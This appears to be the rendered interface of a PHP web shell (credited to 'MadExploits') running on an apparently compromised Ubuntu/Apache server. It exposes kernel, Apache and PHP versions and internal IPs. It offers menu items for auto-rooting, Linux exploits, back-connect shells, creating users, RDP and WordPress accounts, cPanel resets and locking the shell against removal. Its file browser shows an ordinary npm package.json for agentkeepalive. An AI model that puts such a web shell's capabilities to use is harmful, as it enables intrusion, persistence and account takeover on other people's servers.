Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
npm /
node_modules /
agentkeepalive /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
browser.js
144
B
-rw-r--r--
index.d.ts
1.67
KB
-rw-r--r--
index.js
169
B
-rw-r--r--
package.json
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "agentkeepalive", "version": "4.2.0", "description": "Missing keepalive http.Agent", "main": "index.js", "browser": "browser.js", "files": [ "index.js", "index.d.ts", "browser.js", "lib" ], "scripts": { "test": "npm run lint && egg-bin test --full-trace", "test-local": "egg-bin test --full-trace", "cov": "cross-env DEBUG=agentkeepalive egg-bin cov --full-trace", "ci": "npm run lint && npm run cov", "lint": "eslint lib test index.js", "autod": "autod" }, "repository": { "type": "git", "url": "git://github.com/node-modules/agentkeepalive.git" }, "bugs": { "url": "https://github.com/node-modules/agentkeepalive/issues" }, "keywords": [ "http", "https", "agent", "keepalive", "agentkeepalive", "HttpAgent", "HttpsAgent" ], "dependencies": { "debug": "^4.1.0", "depd": "^1.1.2", "humanize-ms": "^1.2.1" }, "devDependencies": { "autod": "^3.0.1", "coffee": "^5.3.0", "cross-env": "^6.0.3", "egg-bin": "^4.9.0", "egg-ci": "^1.10.0", "eslint": "^5.7.0", "eslint-config-egg": "^7.1.0", "mm": "^2.4.1", "pedding": "^1.1.0", "typescript": "^3.8.3" }, "engines": { "node": ">= 8.0.0" }, "ci": { "type": "github", "os": { "github": "linux" }, "version": "8, 10, 12, 14, 16" }, "author": "fengmk2 <fengmk2@gmail.com> (https://fengmk2.com)", "license": "MIT" }
Close